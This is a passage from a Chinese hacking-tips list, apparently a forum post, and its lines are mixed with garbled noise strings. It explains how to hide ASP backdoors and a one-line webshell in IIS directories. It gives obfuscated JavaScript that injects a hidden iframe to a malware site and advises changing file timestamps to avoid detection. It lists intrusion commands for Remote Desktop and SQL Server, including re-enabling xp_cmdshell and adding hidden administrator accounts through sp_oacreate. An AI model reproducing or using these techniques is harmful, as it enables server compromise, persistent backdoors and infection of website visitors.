执行后可以用AT命令查看新加的任务
+ ]+ ]/ Y) D9 N9 W; @8 T j用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
. U2 g/ t2 \ H5 N
' l9 `" c( [9 {53、隐藏ASP后门的两种方法
0 N X A) I8 x1、建立非标准目录:mkdir images..\6 m z) o4 ~, u. J% e
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
6 ?0 q6 n; K/ \6 K通过web访问ASP木马:http://ip/images../news.asp?action=login, g; v0 J: {6 V! y
如何删除非标准目录:rmdir images..\ /s4 S' B7 B1 A" q! Z# P/ s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
# U( M ^- j4 Kmkdir programme.asp5 `$ }; V5 H( f; I6 `
新建1.txt文件内容:<!--#include file=”12.jpg”-->" e7 A J- @1 B+ T4 `5 G# C
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件& i3 F# N: x' A7 I7 Y! L- h1 w
attrib +H +S programme.asp
8 n! q4 K8 N( t' u. u+ h7 J/ V7 G通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt; O7 A7 w, _. M# L" I) w- s6 H" b
0 r5 G" F; [5 m& J
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
\8 o' b; Z; T& s( u* G然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
/ F: j$ H/ o7 w* E" Q5 I5 g" b3 [% e! v" E
55、JS隐蔽挂马* B$ Z' u% N4 e" w
1.2 [) N. ]" y y/ b
var tr4c3="<iframe src=ht";) ~% U0 \5 G! W: E* N
tr4c3 = tr4c3+"tp:/";
* R+ e1 D4 V* ctr4c3 = tr4c3+"/ww";4 e7 P1 G* ~; Q# f
tr4c3 = tr4c3+"w.tr4";4 _5 N: Q5 t) y- |
tr4c3 = tr4c3+"c3.com/inc/m";
4 d' N _$ E% p! i8 \tr4c3 = tr4c3+"m.htm style="display:none"></i";$ J9 H7 T9 [2 ^ s8 m
tr4c3 =tr4c3+"frame>'";/ I8 f. h4 k5 }( M' p
document.write(tr4c3);
3 K! j# }% Y$ n# C6 i" v避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
. i0 r* r5 s) H% |+ n
6 m3 q5 Z- y; D1 z2 |: ?+ F2.
) l% v/ V) m2 H9 {转换进制,然后用EVAL执行。如 F( r4 s( v1 {9 i5 |, ^) p, K* n
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; i" Y+ x4 ~( }& Z e
不过这个有点显眼。
1 H& ]/ P q( E" c* \' r# J3 R3.
& Q) c0 B; V$ d, Xdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');0 w, \) x0 `+ W$ |
最后一点,别忘了把文件的时间也修改下。" K% C; \$ Q7 \$ G8 A6 }) a! C
) X& G+ ?2 M! z: E5 j/ L56.3389终端入侵常用DOS命令
3 C3 y& W4 K! A& X8 A! Mtaskkill taskkill /PID 1248 /t
) p! b) F3 M& p/ T t1 K7 O$ p0 d. Q
tasklist 查进程
! N! d' ^0 Q7 y' Z7 i) X! [: O! w) |) y
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限4 s& E7 U- F% m/ H/ q8 @) q
iisreset /reboot2 f- a7 k- Y' q/ K, L
tsshutdn /reboot /delay:1 重起服务器
& Y, U1 v- \- H4 Q& a1 {
% ?( J+ `! K' j+ O4 Clogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
* y4 X; d" u) Z( ^+ A S. F: A) y" r$ m4 |- g/ X, ]0 Y" o1 k
query user 查看当前终端用户在线情况
: @' T! o1 o! F% b# D6 p4 ^% l
5 Q; o+ i. p4 F$ i* g# n要显示有关所有会话使用的进程的信息,请键入:query process *
- k5 E8 S& e* G/ v( k
* r7 X/ @# b5 h) I要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:20 F7 Z q! B6 }/ ?7 q5 w
0 [. e4 n: Z2 r$ x$ G
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
* E6 M" c# @3 V# Y3 Q% b
2 L! |2 A7 s) P/ U3 e' r, B* _要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02* R- h( J# i4 e+ C. B) s
1 e& A! V e8 E4 I5 s/ Y
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
5 [4 u) x* @: w, l. `( v% L1 Q2 B; V5 o" U% L# A
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- S+ d2 I$ d3 |3 V% g* U( ?: s% j+ U
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。- r- Z! ~' n7 _4 p; d
' @4 H. {- F1 x7 @3 n) M0 ^6 D
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
* p9 P/ _9 B; q* Y
! Q! d7 m! h' S; D" C% M! o" [0 U56、在地址栏或按Ctrl+O,输入:
2 a4 G4 F: a" K7 f. ~( ~! U* pjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
6 I0 v' Y- \2 ?0 K$ V
, Q& Q3 I) ?1 @+ S源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
. ]2 _( l' V& b( ^
' h o7 @/ f3 L. Q+ ^57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
: z. F4 p/ }$ a5 i* G$ i2 g* R用net localgroup administrators是可以看到管理组下,加了$的用户的。4 o2 g( P" W/ { W3 M
! ?; n! d# F0 J+ r- q# e58、 sa弱口令相关命令
5 O& n" ]; X# y9 K# }3 a. u* g/ r ^4 s! q) u$ ?+ r% E! G. \$ _
一.更改sa口令方法:; w) n1 q: W0 P+ I+ ?1 _9 [9 s
用sql综合利用工具连接后,执行命令:. n# b. B0 O6 E
exec sp_password NULL,'20001001','sa'3 ?# y7 j4 e% N
(提示:慎用!)
( w6 F( v: _" b5 t0 S# i1 r: b: H- y6 f, n
二.简单修补sa弱口令.
. @4 D8 L1 `2 c0 d# Q7 ^* I/ k9 u. t3 [% ?; w, y& P& R2 O) q
方法1:查询分离器连接后执行:
' J9 O- z' {- u8 jif exists (select * from
$ Q' g+ m# D1 R, S- R; kdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
5 c: }- u9 G' H9 _- SOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
8 ?9 T& k, i, M0 F
1 F# T5 G+ c" l; _exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'' ^# I2 Q! n: u& Q3 G% _& b
3 h: V, m% }9 V: V# E- s: S/ f
GO5 v: V, E- h# {0 |, a
. c& A8 X* U `# r1 b+ P) ~$ J然后按F5键命令执行完毕
) w+ E2 a" Z8 ~6 W! j& a! y) m; D
5 [7 \# L8 d5 Q, @2 Z$ p方法2:查询分离器连接后
( A$ e4 B) J5 Q/ h* d) m4 `第一步执行:use master
8 X9 {; l& k8 ^' D( x- W第二步执行:sp_dropextendedproc 'xp_cmdshell'
: @; W% r. I. t" t8 ^* ?然后按F5键命令执行完毕
4 a# ]6 F4 J, K$ B* X$ O4 r7 |6 {3 X; g9 [4 Y. H: R
& `+ T( a& J( e0 u; V三.常见情况恢复执行xp_cmdshell.
7 q$ e4 n8 b9 `/ X% h1 s M4 Q
* r% e) d: ]2 C# [2 e- H9 ]& _ f
3 O5 W* p! [: t6 b" k1 未能找到存储过程'master..xpcmdshell'.) D1 ?) ?5 v. P/ ]/ m
恢复方法:查询分离器连接后,6 }, o5 E* H( r6 T* N/ l; m
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ o! C% y5 G; \) V% R. {- R第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& L0 r8 r7 r; P3 W% ^3 r然后按F5键命令执行完毕
! W$ h6 G' Q3 E% u1 [& a" A) x, u& i, p: Y5 V8 @5 V
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
3 `3 `% d/ M$ L7 E恢复方法:查询分离器连接后,. @7 O- Z! o w1 _. _
第一步执行:sp_dropextendedproc "xp_cmdshell"4 \5 }4 |! Z+ Y/ r) o: i
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 f( I- x" ?3 G0 e& M. u$ C然后按F5键命令执行完毕$ N; o' d" i B* k! }! j1 K
, @5 c* w; j, h0 h- E9 A- ]3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. v0 w; t0 j4 R$ h: ~恢复方法:查询分离器连接后,* U9 x; v4 L1 M+ n$ m
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
3 e, D) {2 f& Q, C( {- _第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
6 G) D$ V8 z* e& s然后按F5键命令执行完毕
8 ~6 i- [& l0 _1 M* T2 I
: @7 f7 H. T7 U6 [四.终极方法.8 K0 I E# }1 }* v2 N
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
* Z# G: h, ^( D( g6 ^+ L& A2 c0 M查询分离器连接后,
$ s4 U- p; f' `2000servser系统:7 D2 k- Q& N. _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'3 L) Q( R% [1 C+ q' P/ z
9 J$ q4 x+ K. Q- G' X% n5 rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'2 w2 P/ j6 i3 h, }/ I+ o
' V( u$ o+ [+ m1 `* \1 L& T g
xp或2003server系统:6 y0 |5 N7 Q" p5 |
* |0 V/ D: F, v4 F1 ^; u5 }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'6 R8 U5 Y! y* o% f1 _0 d
6 i, o" Z+ E+ l+ l+ d! ?2 Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'( o2 A) y" K& }* e9 z
|